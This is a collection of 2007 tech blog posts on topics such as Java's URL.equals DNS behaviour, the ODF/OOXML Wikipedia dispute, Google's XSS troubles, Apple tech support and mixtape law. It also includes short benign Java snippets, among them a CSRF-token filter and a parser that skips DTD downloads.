I just found the post Mr. Gosling - why did you make URL equals suck?!? on programming.reddit.com and had to share it.

Okay, I'm totally hacked! The java.net.URL class officially sucks! The equals method on this shining example of the JDK API mess actually does a blocking DNS lookup to resolve the host string to an IP address and then compares the IP addresses rather than the host strings. What freakin' sense does that make?

Simple example:

URL url1 = new URL("http://foo.example.com");
URL url2 = new URL("http://example.com");

Let’s say these map to these IP addresses:

http://foo.example.com => 245.10.10.1
http://example.com => 245.10.10.1

Here’s the scary part:

url1.equals(url2) => true!

That's definitely the best example I've seen from a standard library of code that deserves to be on The Daily WTF. Just thinking about all the code I have in RSS Bandit that tests URLs for equality, it boggles my mind that a standard library could ship such a craptacular implementation of the equals() method.
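
If you're stuck with Java code that needs to compare URLs, the usual workaround is to compare java.net.URI instances (or just the URL strings) instead, since URI.equals() compares components textually and never touches the network. A quick sketch, using the made-up hosts from the example above:

import java.net.URI;
import java.net.URL;

public class UrlEqualsDemo {
  public static void main(String[] args) throws Exception {
    URL url1 = new URL("http://foo.example.com");
    URL url2 = new URL("http://example.com");
    // Resolves both hosts via DNS; can block and can return true
    // for different hosts that happen to share an IP address.
    System.out.println(url1.equals(url2));

    URI uri1 = URI.create("http://foo.example.com");
    URI uri2 = URI.create("http://example.com");
    // Pure string/component comparison, no network I/O => false.
    System.out.println(uri1.equals(uri2));
  }
}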

Anyone have similar examples from other standard libraries (C++, .NET, JDK, Ruby, etc)? I need some bad code to cheer me up after a day that's already had too many meetings. :)


 

Some of you may have seen the recent hubbub related to Microsoft and BlueJ. If you haven't, you can get up to speed from articles such as Microsoft copies BlueJ, admits it, then patents it. An update to this story was posted by Dan Fernandez in his blog post entitled Update: Response to BlueJ Patent Issues where he wrote

On Friday, an alert reader emailed me about a new article by Michael Kölling, the creator of BlueJ, about a patent issued by Microsoft for features in Object Test Bench that are comparable to BlueJ's Object Bench. I'll post the full "anatomy of a firedrill" some time later, but for now we can officially say that the patent application was a mistake and one that should not have happened. To fix this, Microsoft will be removing the patent application in question. Our sincere apologies to Michael Kölling and the BlueJ community.

I'm glad this has been handled so quickly. I hope the news of Microsoft withdrawing the patent application spreads as fast and as far as the initial outrage at the news of the patent application being filed. 


 

Categories: Technology

I noticed that the top headline on Techmeme this afternoon is a couple of posts from Robert Scoble complaining that not enough people link to his blog. At first, I was scratching my head at this given that Robert's blog still manages to rank in the top 50 most linked blogs according to the Technorati Top 100, but then I saw a post by Jeff Sandquist that made things clearer.

In his post entitled Scoble Intel LinkGate 2007 - Bootstrapping a new business via blogs Jeff Sandquist writes

I can empathize with Robert to a point on this. I am well aware of how damn hard it is to build an audience. Robert is tasked with doing this for PodTech, a relatively new business, and the stakes are high. Exclusive content like Robert's Intel piece took time and money to produce (flight to Portland, cameras, bandwidth, a crew and more) and needs to show a return. I can imagine that PodTech looked at a piece like this as a bootstrap for their network. The hope being that the exclusive piece will get Slashdotted, Digged or high profile tech blogs (Engadget / Gizmodo) will also follow suit. The hope is that a few of those viewers will stick around, view other PodTech content and maybe others will subscribe to the feed to return another day. Building an audience, inch by inch, is hard work. This all takes persistence and time, all while you are justifying to your sponsors and leaders your content style and tone. So when the Intel piece doesn't result in a lot of flow (guess we're still in the eyeball game ;)) from the big sites, Robert flew off the handle in frustration.

I believe as this business grows, it is going to get even harder to bootstrap the business solely through traditional grass roots/link based marketing. With the number of blogs and media sites continuing to grow, it will get harder and harder to get links to even the most exclusive content.

From that perspective it now makes sense to me. PodTech hired an A-list blogger in the hopes that he'd bring in lots of traffic due to the popularity of his blog, but it looks like that isn't working as well as they'd like and now Robert is beginning to feel the pressure. I tend to agree with Jeff that perhaps PodTech should look to more than the blog of their A-list blogging employee as their primary source of traffic and buzz. 

This also explains why Robert felt obligated to give a shout out to PodTech when he got listed as one of the Web's Top 25 celebrities instead of basking in the glow of getting such props from the mainstream media. There's probably a lesson here for folks who plan to parlay their blog fame into an endeavor that requires driving eyeballs and capturing an audience.


 

I like the concept of online Q&A sites and I have to say that I've been quite impressed at how successful Yahoo! has been with Yahoo! Answers. Not only did they build a good end user experience but they followed up with heavy cross promotion on their other services, TV ads, and getting lots of real-world celebrities to use the service. My favorite questions asked by real-world celebrities thus far:

Based on your own family's experience, what do you think we should do to improve health care in America? asked by Hillary Clinton (U.S. Senator and Presidential Candidate)

What should we do to free our planet from terrorism? asked by Dr. APJ Abdul Kalam (President of India)

That's pretty freaking cool. Kudos to the Yahoo! Answers team for being able to pull off such a great promotion and build such a successful service in such a short time. 


 

January 26, 2007
@ 02:13 AM

Interesting, it seems Flickr has formalized the notion of partitioning tags into namespaces with their introduction of Machine Tags, which are described as

# What are machine tags?

Machine tags are tags that use a special syntax to define extra information
about a tag.

Machine tags have a namespace, a predicate and a value. The namespace defines a class or a facet that a tag belongs to ('geo', 'flickr', etc.) The predicate is the name of the property for a namespace ('latitude', 'user', etc.) The value is, well, the value.

Like tags, there are no rules for machine tags beyond the syntax to specify the parts of a machine tag. For example, you could tag a photo with:

* flickr:user=straup

* flora:tree=coniferous

* medium:paint=oil

The XML geek in me can't help but squint at the term "namespaces" and wonder how they plan to avoid naming collisions in a global namespace (e.g. if multiple people choose the same name for a namespace they create). I guess this is no different from people using the same word to tag an item while meaning totally different things (e.g. "apple", "glass", "light", etc.) and folksonomies like Flickr seem to handle this just fine.

Creating facets in tags like this isn't new; del.icio.us has had this for a while and it looks like a good way to create hidden tags that the system can use for performing special operations without them being in the user's face.

Now that the two granddaddies of tagging both provide this functionality, I wonder how long it will take for machine tags to wind their way through all the tagging systems in the various copycat Web 2.0 sites on the Web.
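
For the curious, parsing one of these is trivial. Below is a minimal sketch of splitting a machine tag into its namespace, predicate and value parts per the syntax described above; this is purely my own illustration, not code from the Flickr API:

public class MachineTag {
  public final String namespace;
  public final String predicate;
  public final String value;

  private MachineTag(String namespace, String predicate, String value) {
    this.namespace = namespace;
    this.predicate = predicate;
    this.value = value;
  }

  // Returns null if the tag isn't in namespace:predicate=value form,
  // i.e. it's just a plain old tag.
  public static MachineTag parse(String tag) {
    int colon = tag.indexOf(':');
    int equals = tag.indexOf('=', colon + 1);
    if (colon <= 0 || equals <= colon + 1 || equals == tag.length() - 1) {
      return null;
    }
    return new MachineTag(tag.substring(0, colon),
                          tag.substring(colon + 1, equals),
                          tag.substring(equals + 1));
  }

  public static void main(String[] args) {
    MachineTag t = MachineTag.parse("geo:latitude=47.6");
    System.out.println(t.namespace + " / " + t.predicate + " / " + t.value);
  }
}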


 

OPTION A: Samurai X - Complete

Vote in the comments below. Bonus points if you justify your vote.


 

Categories: Personal

From the blog post entitled Check out what we just added to Windows Live Spaces! on the Windows Live Spaces team's blog we learn

Videos, videos and more videos

You asked for it, we created it!  We’ve built more rich media capabilities into Windows Live Spaces so it’s easier for you to display your favorite videos on Spaces.  You can now embed videos directly into your Spaces blog entries.  Adding a visual element to your blogs can help you tell your story.  

For a long time, Windows Live Spaces has prevented users from embedding videos from video sharing sites like YouTube and MSN Soapbox because it didn't allow users to use object tags in their blog content. However it is now commonplace for users to embed Flash objects in their blog posts and even though there were security concerns, user demand has trumped them and the blogging landscape has changed.

I'm glad Windows Live Spaces now enables this but it does point to an interesting problem for me as a developer on RSS Bandit. Currently, we disable displaying embedded objects in content by default. Has the time come to change that rule? I know I changed my security settings in RSS Bandit so I could watch embedded YouTube videos on blogs months ago and even had to fix some bugs where it seems we were a bit overzealous in blocking ActiveX controls.

It seems enabling ActiveX/Flash and Javascript in your browser is becoming mandatory if you actually want to browse the Web, thanks to "Web 2.0".


 

Categories: Windows Live

Earlier this week, Tim Bray wrote a blog post entitled On Linking where he pointed out that it has become quite commonplace for him to link to the Wikipedia entry for a subject even if there is an official site. He also realizes this is a problem when he writes

Why Not Wikipedia? · But this makes me nervous. I feel like I’m breaking the rules; being able to link to original content, without benefit of intermediaries, is one of the things that defines the Web. More practically, when I and a lot of other people start linking to Wikipedia by default, we boost its search-engine mojo and thus drive a positive-feedback loop, to some extent creating a single point of failure; another of the things that the Web isn’t supposed to have.

I’d be astonished if the Wikipedia suddenly went away. But I wouldn’t be very surprised if it went off the rails somehow: Commercial rapacity, legal issues, or (especially) bad community dynamics, we’ve seen that happen to a whole bunch of once-wonderful Internet resources. If and when it did, all those Wikipedia links I’ve used (396 so far, starting in June 2004) become part of a big problem.

As if on cue, a little bit of hubbub broke out on the Web after Rick Jelliffe blogged that he'd been approached by Microsoft to help keep some articles about its technology neutral. Lots of folks in the press, from the usual suspects on Slashdot to more mainstream news sources like USA Today, have jumped all over this and called it an attempt by Microsoft to "astroturf" Wikipedia.

Let's dig a little deeper into the issue and look at the facts as opposed to the sensational headlines. Mike Arrington over at TechCrunch has a good collection of links to the relevant online occurrences in his post entitled Battleground Wikipedia which contains the following excerpts

Doug Mahugh at Microsoft freely admitted to doing this in a comment to a Slashdot article on the matter. According to another source, a Microsoft spokesperson also chimed in, saying that they believed the article was heavily written by people at IBM, a rival standard supporter, and that Microsoft had gotten nowhere flagging mistakes to Wikipedia’s volunteer editors. However, the discussion area of the Wikipedia page in question does not show any Microsoft involvement.

Microsoft clearly didn’t feel comfortable making direct changes to article about their technology, and frankly they can’t really be blamed for that. Editing an article about yourself is considered a conflict of interest by many in the Wikipedia community, and people are routinely trashed for doing so.
...
In the words of Deep Jive Interests “if you’re going to astroturf [Wikipedia], do it right!”

I'm trying to figure out how we get from Microsoft having problems flagging mistakes to Wikipedia's editors and trying to get the relevant entry updated without violating Wikipedia's conflict of interest rules, to the claim that Microsoft is trying to astroturf Wikipedia.

Given that the Wikipedia entry is the first or second result on Google searches for "ooxml" and Office Open XML yet has contained misinformation and outright fabrications about the technology, shouldn't Microsoft be trying to get the article corrected while staying within the rules of Wikipedia?

As an experiment I've updated the Wikipedia entry for TechCrunch with a mention of some of the claims about Mike Arrington's conflicts of interest on the site and references to negative blog posts but no link to his side of the story. TechCrunch is big enough for Mike not to care about this but what should be his course of action? According to Jimmy Wales and the pundits it seems (i) he can't edit the entry himself nor (ii) can he solicit others to do so. Instead he needs to write a white paper about his position on the conflicts of interest and then link to it from the talk page for his entry. Yeah, I'm sure that's going to get read as much as the Wikipedia entry.

It's sad that if Microsoft had just done what other companies do and had a bunch of employees policing its brand on Wikipedia (see the Forbes article Shillipedia), this would never have made the news. It's unfortunate that this is the reward Microsoft gets for being transparent and open instead of taking the low road. 


 

Categories: Social Software

In response to my recent post entitled ODF vs. OOXML on Wikipedia one of my readers pointed out

Well, many of Weir's points are not about OOXML being a "second", and therefore unnecessary, standard. Many of them, I think, are about how crappy the standard actually is.

Since I don't regularly read Rob Weir's blog this was interesting to me. I wondered why someone who identifies himself as working for IBM on various ODF technical topics would be spending a lot of his time attacking a related standard as opposed to talking about the technology he works on. I assumed my reader was mistaken and decided to subscribe to his feed and see how many of his recent posts were about OOXML. Below is a screenshot of what his feed looked like when I subscribed to it in RSS Bandit a few minutes ago

Of his 24 most recent posts, 16 of them are explicitly about OOXML while 7 of them are about ODF.

Interesting. I wonder why a senior technical guy at IBM is spending more time attacking a technology that its proponents claim isn't even competitive with his own instead of talking about the technology he works on. Reading the blogs of Microsoft folks like Raymond Chen, Jensen Harris or Brian Jones, you don't see them dedicating two thirds of their blog postings to bashing rival products or technologies.

From my perspective as an outsider in this debate, it seems to me that OOXML is an over-specified, open XML document format that is backwards compatible with the billions of documents produced in Microsoft Office formats over the past decade. On the other hand, ODF is an open XML document format that aims to be a generic format for storing business documents not tied to any one product, but which still needs some work in beefing up the specification in certain areas if interoperability is the goal.

In an ideal world both of these efforts would be trying to learn from each other. However it seems that for whatever reasons IBM has decided that it would rather that Microsoft failed at its attempt to open up the XML formats behind the most popular office productivity software in the world. How this is a good thing for Microsoft's customers or IBM's is lost on me.

Having a family member who is in politics, I've learned that whenever you see what seems like religious fundamentalism there usually is a quest for money and/or power behind it. Reading articles such as Reader Beware as ODF News Coverage Increases, it seems clear that IBM has a lot of money riding on being first to market with ODF-enabled products while simultaneously encouraging governments to mandate only ODF. The fly in the ointment is that the requirement of most governments is that the document format be open, not that it be ODF. Which explains IBM's unfortunate FUD campaign. 

Usually, I wouldn't care about something like this since this is Big Business and Politics 101, but there was something that Rick Jelliffe wrote in his post An interesting offer: get paid to contribute to Wikipedia which is excerpted below

So I think there are distinguishing features for OOXML, and one of the more political issues is do we want to encourage and reward MS for taking the step of opening up their file formats, at last?

The last thing I'd personally want is for this experience to sour Microsoft on opening up its technologies, so I thought I'd throw my hat in the ring at least this once.

PS: It's pretty impressive that a Google search for "ooxml" pulls up a bunch of negative blog posts and the Wikipedia article as the first couple of hits. It seems the folks on the Microsoft Office team need to do some SEO to fix that pronto.


 

Categories: Competitors/Web Companies | XML

From the blog post entitled Use Live Search and We'll Donate to Team Seattle and Ninemillion.org on the Live Search team's blog we learn

The Live Search team recently launched two new programs to help children in need, and we would love you to help us out. The good news is that all you have to do to help us is try Live Search on one of our “click for the cause” sites, and each search you do will add more money to Microsoft’s donation.

The two organizations we are working with in these programs are  ninemillion.org and Team Seattle. Ninemillion.org is a United Nations led campaign providing education and sports programs for nine million refugee youth around the world

...

Ninemillion.org - click4thecause.live.com


Live Search is a global business, so we wanted a way to help kids all over the world who are in need. Supporting Ninemillion.org and their mission to help 9 million refugees really stood out as a great way to make an impact.  Each search at click4thecause.live.com results in a financial donation from Microsoft to provide help with education programs to the refugee kids around the globe. More info on ninemillion.org’s work with these youth can be found at their Windows Live Spaces blog.

In addition to the money raised from the searches, Microsoft is also donating online advertising and editorial space across MSN and microsoft.com to raise awareness of the relief effort.

I'm not one to ask my readers to use our services but in this case I'm making an exception. Please check out http://click4thecause.live.com to learn more about ninemillion.org and perform some searches.

Thanks for your time.


 

Categories: Windows Live

Apple's tech support is a real clusterfuck. What is amazing to me is that I know how bad their tech support is yet their products have been so much better than the competition's that I keep buying Apple devices. Yesterday I was at the Genius Bar at the Apple Store in Tukwila to report a problem with my video iPod. For some reason, my iPod no longer plays sound out of the right side of any headphones plugged into it.

Before complaining about the experience, I should probably point out the one positive thing about it: I could make an appointment online instead of waiting around in the store for a "genius" to become available. I got there a little early and got to marvel at the all-in-one design of the iMacs, which blew my mind as someone who spends all his time on Dell PCs and laptops. Now that I can run Windows on a Mac, I may end up buying one of these the next time I have to buy a computer. 

Anyway, back to my tech support woes. When my turn came up, I told the "genius" my problem and he gave me two options.

  1. I could get a refurbished iPod as a replacement from Apple, which would cost me either $200 or $0 (if mine was still under warranty)
  2. I could go online and try an iPod repair site like iPodResQ, which isn't affiliated with Apple at all.

Since my iPod was no longer under warranty and I didn't feel like paying $200 for a used iPod, I decided to go with iPodResQ. While the iPod "genius" was helping me, I noticed that the Mac "genius" was also answering some questions from a customer about Apple Boot Camp. The Mac "genius" told the customer to go to Google and search for "Apple Boot Camp" to get information about it.

At this point it seemed to me that Apple Inc. can save itself a lot of money and its customers a lot of time by replacing its Genius Bars with the following FAQ

Q: I have a question about ...
A: Go to Google and type your question.

Q: I have a problem with my iPod
A: Go to iPodResQ

Q: I have a problem with my iMac/Mac Pro/Mac Mini/MacBook
A: Go to MacResQ

It's really a sad testament to the PC industry that despite these negative tech support experiences with Apple products I'd still get a 20-inch iMac in a heartbeat.


 

Categories: Rants

January 22, 2007
@ 09:44 PM

This morning I stumbled upon a post by Rick Jelliffe which piqued my interest, entitled An interesting offer: get paid to contribute to Wikipedia, where he writes

I’m not a Microsoft hater at all, it's just that I’ve swum in a different stream. Readers of this blog will know that I have differing views on standards to some Microsoft people at least.
...
So I was a little surprised to receive email a couple of days ago from Microsoft saying they wanted to contract someone independent but friendly (me) for a couple of days to provide more balance on Wikipedia concerning ODF/OOXML. I am hardly the poster boy of Microsoft partisanship! Apparently they are frustrated at the amount of spin from some ODF stakeholders on Wikipedia and blogs.

I think I’ll accept it: FUD enrages me and MS certainly are not hiring me to add any pro-MS FUD, just to correct any errors I see.
...
Just scanning quickly the Wikipedia entry I see one example straight away:
The OOXML specification requires conforming implementations to accept and understand various legacy office applications. But the conformance section to the ISO standard (which is only about page four) specifies conformance in terms of being able to accept the grammar, use the standard semantics for the bits you implement, and document where you do something different. The bits you don’t implement are no-one’s business. So that entry is simply wrong. The same myth comes up in the form “You have to implement all 6000 pages or Microsoft will sue you.” Are we idiots?

Now I certainly think there are some good issues to consider with ODF versus OOXML, and it is good that they come out and get discussed. For example, the proposition that “ODF and OOXML are both office document formats: why should there be two standards?” is one that should be discussed. As I have mentioned before on this blog, I think OOXML has attributes that distinguish it: ODF has simply not been designed with the goal of being able to represent all the information possible in an MS Office document; this makes it poorer for archiving but paradoxically may make it better for level-playing-field, inter-organization document interchange. But the archiving community deserves support just as much as the document distribution community. And XHTML is better than both for simple documents. And PDF still has a role. And specific markup trumps all of them, where it is possible. So I think there are distinguishing features for OOXML, and one of the more political issues is do we want to encourage and reward MS for taking the step of opening up their file formats, at last?

I'm glad to hear that Rick Jelliffe is considering taking this contract. Protecting your brand on Wikipedia, especially against well-funded or organized detractors, is unfortunately a full-time job and one that really should be performed by an impartial party, not a biased one. It's great to see that Microsoft is not only savvy enough to realize that keeping an eye on Wikipedia entries about itself is important but is also seeking objective third parties to do the policing.

It looks to me like online discussion around XML formats for business documents has significantly deteriorated. When I read posts like Rob Weir's A Foolish Inconsistency and The Vast Blue-Wing Conspiracy or Brian Jones's Passing the OpenXML standard over to ISO, it seems clear that rational technical discussion is out the window and the parties involved are in full mud slinging mode. It reminds me of watching TV during U.S. election years. I'm probably a biased party but I think the "why should we have two XML formats for business documents" line that is being thrown around by IBM is crap. The entire reason for XML's existence is so that we can build different formats that satisfy different needs. After all, no one asks why the ODF folks had to invent their own format when PDF and [X]HTML already exist. The fact that ODF and OOXML exist yet have different goals is fine. What is important is that they are both non-proprietary, open standards, which prevents customers from being locked in, and that is what people really want.

And I thought the RSS vs. Atom wars were pointless.

PS: On the issue of Wikipedia now using nofollow links, I kinda prefer Shelley Powers's idea in her post Wikipedia and nofollow that search engines treat Wikipedia specially as an 'instant answer' (MSN speak) or OneBox result (Google speak) instead of including it in the organic search results page. It has earned its place on the Web and should be treated specially, including the placement of disclaimers warning Web n00bs that its information should be taken with a grain of salt.


 

Categories: XML

Danny Thorpe has a blog post entitled Windows Live Contacts Control Shows Online Presence where he writes

This month's rev of the Windows Live Contacts Control adds a new "tile" view that displays the photos of your Windows Live IM contacts in the control, and makes starting an IM session with them a simple one-click operation.  The top part of this screenshot shows the new tile view.  The bottom part is another instance of the contacts control in list view mode.

Windows Live Contacts Control tile and list views

This widget can be embedded on a page and used to enable Windows Live/MSN users to view or otherwise interact with their Windows Live Messenger buddies or Hotmail contacts. I've been following the development of this widget since the project started and it is definitely getting interesting.


 

Categories: Windows Live

We are now feature complete for the next release of RSS Bandit and it's time to do the final bits of user testing before we declare the bits golden. You can obtain the installer from RssBandit.1.5.0.5.Jubilee.RC.zip. We've fixed a number of major bugs that were discovered during the beta, including crashes related to building the Lucene search index and podcasts being repeatedly downloaded after the first successful download attempt. I'd like to thank all the people who tried out the beta and gave us feedback. Windows Vista users should be especially happy with this release since it is the first version of RSS Bandit (ever) to work on that operating system with no problems.

The major new features and bug fixes since the last official release (v.1.3.0.42) are listed below. There will be a comprehensive list of bug fixes and new features in the announcement for the final release. New features and bug fixes since the last beta are marked as .

New Features
Major Bug Fixes
 

Categories: RSS Bandit

January 18, 2007
@ 11:34 PM

I've always wondered how mixtape DJs can get away with selling CDs consisting of people rapping over hot beats from popular pop songs without a nod to the original artist or producer. According to the New York Times story With Arrest of DJ Drama, the Law Takes Aim at Mixtapes it looks like they won't be getting away with it anymore. Excerpt below

In the world of hip-hop few music executives have more influence than DJ Drama. His “Gangsta Grillz” compilations have helped define this decade’s Southern rap explosion. He has been instrumental in the careers of rappers like Young Jeezy and Lil Wayne. He appears on the cover of the March issue of the hip-hop magazine XXL, alongside his friend and business partner T.I., the top-selling rapper of 2006. And later this year DJ Drama is scheduled to make his Atlantic Records debut with “Gangsta Grillz: The Album.”
...
Mixtapes are, by definition, unregulated: DJs don’t get permission from record companies, and record companies have traditionally ignored and sometimes bankrolled mixtapes, reasoning that they serve as valuable promotional tools. And rappers have grown increasingly canny at using mixtapes to promote themselves. The career of 50 Cent has a lot to do with his mastery of the mixtape form, and now no serious rapper can afford to be absent from this market for too long.
...
DJ Drama’s mixtapes are often great. He has turned “Gangsta Grillz” into a prestige brand: each is a carefully compiled disc, full of exclusive tracks, devoted to a single rapper who is also the host. Rappers often seem proud to be considered good enough for a “Gangsta Grillz” mixtape. On “Dedication,” the first of his two excellent “Gangsta Grillz” mixtapes, Lil Wayne announces, “I hooked up with dude, now we ’bout to make history.” The compilation showed off Lil Wayne more effectively than his albums ever had, and “Dedication” helped revive his career.

This sucks. I love mixtapes and would hate for the RIAA to cause an end to mixtape series like Gangsta Grillz or G-Unit Radio. What I didn't expect, though, was that Lil Wayne would start talking smack about DJ Drama after DJ Drama helped resurrect his career. From the VH1 article, 'Play The Game Fair': Lil Wayne Responds To DJ Drama's Mixtape Bust

"Smarten up," Lil Wayne advised mixtape DJs. "Smarten up."

For the past few years, Wayne has seen his entire career shift thanks to his performance on mixtapes. Street CDs such as his Gangsta Grillz classics The Dedication and The Dedication 2 have catapulted him to the lyrical elite in the minds of fans. Last year, he may have been the MC with the most material on the mixtape circuit.

"It's a bad thing," Wayne said of the Aphilliates' arrests, "but you gotta play the game fair. If you don't play fair, all kind of things can happen. You gotta watch people like DJ Clue, watch people like DJ Khaled. They do it right."

Wow. All I can say to that is Stop Snitching.


 

Categories: Music

January 18, 2007
@ 02:59 PM

I've been spending my free time putting the finishing touches on the next beta of the Jubilee release of RSS Bandit so I've been remiss at blogging and have accumulated a bunch of things to blog about which I never got around to posting. Here is an outpouring of links from my 'to blog' list

  • 20Q.net: The classic game of twenty questions powered by a neural network. It is uncanny how good this game was at guessing what I was thinking about. This is the closest to magic I've seen on the Web.

  • programming.reddit.com: If you are the kind of geek who finds Jeff Atwood's blog to be a fun read then this is the meme tracker for you. Light on fluffy A-list geek wankery over the latest from Apple & Google and heavy on programming culture from the trenches.

  • The Story of XMLHTTP: The most complete account of the creation of one of the cornerstones of AJAX that I've seen online. I've actually worked with some of the people mentioned in the story.

  • Zeichick's Take: Remember CUA Compliance? Microsoft Doesn't: The most amusing rant about the new ribbon in Microsoft Office 2007 I've seen yet. My favorite quote, "Microsoft says that the problem was that users couldn't find and use the more obscure features of Word, Excel and the other Office tools. No, that wasn't the problem. The problem was that there were too many features". I guess his solution would have been for Microsoft to cut a bunch of features from Office instead of redesigning the UI. Yeah, right.

  • To DTD or not to DTD: It looks like Netscape is getting ready to break all of the RSS 0.91 feeds on the Web that reference their DTD, which is practically all of them. I need to ensure that this doesn't cause problems in RSS Bandit (a quick sketch of how a parser can skip the DTD fetch entirely follows this list). I like how the Netscape guy tries to blame RSS reader developers for using XML as designed. Another example of how XML schemas in general and DTDs in particular were one of the worst concepts foisted on XML. We should have been trying to make our programming languages as dynamic as XML, not make XML as rigid as our programming languages. Maybe we'll have better luck in the JSON era.
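
For what it's worth, the sketch below shows the general technique for a Java-based reader: tell the XML parser up front not to fetch external DTDs at all, so it doesn't matter whether Netscape keeps hosting the file. (RSS Bandit is a .NET application so the actual fix there is different; the feature URI below is the Xerces one honored by the JDK's built-in parser.)

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class FeedFetcher {
  public static Document parseFeed(String feedUrl) throws Exception {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    dbf.setValidating(false);
    // Skip downloading external DTDs (like the RSS 0.91 DTD) entirely.
    dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    DocumentBuilder db = dbf.newDocumentBuilder();
    return db.parse(feedUrl);
  }
}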

PS: If you are an RSS Bandit user then check back this weekend for the final beta. We are now feature complete and should now work just fine on Windows Vista. However some of the podcast-related features had to be scaled back for this release.


 

January 16, 2007
@ 08:23 PM

By now it's common news that Google has been hit by what seems like half a dozen or more cross-site scripting security flaws in the past month. If you missed the news, you can read blog posts like More Google security failures and Wow, more Google XSS problems which contain links to some of the stories of recent exploits. The bugs in those blog posts aren't exhaustive; I've seen some blog posts about exploits that don't seem to have hit the mainstream tech blogs, such as the one mentioned in the blog post Pending Members - Google Groups XSS Bug [Part 2].

Anyway, the fact that Google is having problems with XSS issues isn't terribly interesting and should be an expected part of the growing pains as they go from a service that doesn't store any user data to one that aims to be the repository of all their users' data. That requires an entirely different approach to security. What I did find interesting was a blog post on the Google Blogoscoped blog entitled On Google Security which stated

Today, it almost seems as if every single product team in the Googleplex has the “power” to accidentally introduce a Google Account risk with an HTML injection hole, or another kind of cross-site scripting issue. An exotic Blogger bug was able to reveal your Google Docs, even if you’re not blogging with Blogger – an improbable Google Base bug was able to reveal your personalized homepage, even when you’ve never worked with Google Base**. I would argue: these things happen, individual developers and developer teams make errors. It’s impossible not to. There are ways to automatically test against HTML injections, but such tools too need to be handled by humans.

The real problem, and solution, might be on the higher level of the system architecture – the way Google integrates its services and handles cookie data. Right now, the Google Office product partly resembles a mighty convenient & long chain... a chain which is only as strong as its weakest link. Is this a trade-off we’ll just have to make with future web apps, or are there ways to improve on the situation... either by users, or those building browsers, or those developing web apps?

Those who ignore history are doomed to repeat it. None of the problems listed are unique to Google. Any portal that provides multiple services that require the user to log in is vulnerable to these problems. This includes competing portals like Yahoo!, MSN and AOL. All of these services have had to encounter and protect users against the very same problems Google is having difficulty dealing with today.

It is likely that with time, Google will stumble upon the same set of best practices that are common knowledge amongst its portal competitors who have been in the game a lot longer. Thinking that this is a problem that affects "the future of Web apps" ignores the history of the Web. 

In the meantime, if you are a Web developer at Google, I'd suggest reading Chapter 12 of Writing Secure Code by Michael Howard. After that, take a look at You know about XSS. How about XSRF/CSRF? which happens to use a Google service as an example of a Cross Site Request Forgery (XSRF) attack.
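
In case the XSRF/CSRF part is new to anyone, the standard defense is to tie every state-changing request to a secret token stored in the user's session, which a request forged from another site can't know. Here's a rough servlet-filter sketch of the idea; the class and parameter names are mine, not taken from any of the articles above:

import java.io.IOException;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.*;
import javax.servlet.http.*;

public class CsrfTokenFilter implements Filter {
  private static final String TOKEN = "csrfToken";
  private final SecureRandom random = new SecureRandom();

  public void init(FilterConfig config) {}
  public void destroy() {}

  public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
      throws IOException, ServletException {
    HttpServletRequest request = (HttpServletRequest) req;
    HttpServletResponse response = (HttpServletResponse) res;
    HttpSession session = request.getSession();

    // Hand out a per-session token the first time we see this user;
    // pages embed it in forms as a hidden field.
    String token = (String) session.getAttribute(TOKEN);
    if (token == null) {
      byte[] bytes = new byte[16];
      random.nextBytes(bytes);
      token = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
      session.setAttribute(TOKEN, token);
    }

    // State-changing requests must echo the token back; a cross-site
    // forgery has no way to read it, so the request gets rejected.
    if ("POST".equals(request.getMethod())) {
      String submitted = request.getParameter(TOKEN);
      if (submitted == null || !submitted.equals(token)) {
        response.sendError(HttpServletResponse.SC_FORBIDDEN, "missing or invalid CSRF token");
        return;
      }
    }
    chain.doFilter(req, res);
  }
}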

That which doesn't kill us only makes us stronger. ;)


 

January 16, 2007
@ 05:57 PM

Danny Sullivan over at Search Engine Land has a post entitled comScore: Google Wins Again & IE7 Doesn't Stop Microsoft's Slide where he writes

It's that time again -- search popularity stats for last month are coming out. Actually, Hitwise sent me their figures earlier this month but I'm diving in with the comScore figures that just came out. The main real news is despite the Internet Explorer 7 launch, Microsoft's Live continues to show a drop in usage.

What is puzzling to me is that people thought the release of IE 7 would cause an increase in search share for Microsoft's search engine and a decline for its competitors. The fact is that built-in search boxes within the browser encourage people to treat search as a feature of the browser instead of a site they visit. That means that the defaults built into the browser/operating system are important. But what exactly is the default search engine on most PCs running IE 7? I don't have any hard numbers but here's some data from my post about this entitled Competing with Google is Like the War in Iraq which stated

The combination of the proliferation of search toolbars and a new generation of Web browsers with built-in search boxes (e.g. IE 7 and Firefox) have reduced the need for users to actually go to websites to perform a search. This means that it is now very important to be the search engine that is used when a user enters a search directly from their browser. Guess which search engine is the one used by your browser if you
  1. Are you a user of the Firefox browser?
  2. Are you a user of the Opera browser?
  3. Are you a user of IE 7 and have installed Adobe Acrobat?
  4. Are you a user of IE 7 and have installed the Java runtime?
  5. Are you a user of IE 7 and have installed the WinZip archive utility?
  6. Are you using a newly purchased Dell computer?
  7. Are you a user of the Google Toolbar?
Yes, the answer is Google in every case. So even if you are an Internet n00b who hasn't made up their mind about which search engine to choose, there is a large chance that the default search engine you end up using thanks to recent innovations in IE 7 and Firefox will be Google.

If anything, browsers like Firefox and IE 7 make it harder for users to switch from Google not easier because it gets them away from the notion of visiting websites to perform searches and instead they just accept whatever default the browser provides.


 

There's an article in the NY Times entitled Want an iPhone? Beware the iHandcuffs which contains the following excerpt

Even if you are ready to pledge a lifetime commitment to the iPod as your only brand of portable music player or to the iPhone as your only cellphone once it is released, you may find that FairPlay copy protection will, sooner or later, cause you grief. You are always going to have to buy Apple stuff. Forever and ever. Because your iTunes will not play on anyone else’s hardware.

Unlike Apple, Microsoft has been willing to license its copy-protection software to third-party hardware vendors. But copy protection is copy protection: a headache only for the law-abiding.

Microsoft used to promote its PlaysForSure copy-protection standard, but there must have been some difficulty with the “for sure” because the company has dropped it in favor of an entirely new copy-protection standard for its new Zune player, which, incidentally, is incompatible with the old one.

Pity the overly trusting customers who invested earlier in music collections before the Zune arrived. Their music cannot be played on the new Zune because it is locked up by software enforcing the earlier copy-protection standard: PlaysFor(Pretty)Sure — ButNotTheNewStuff.

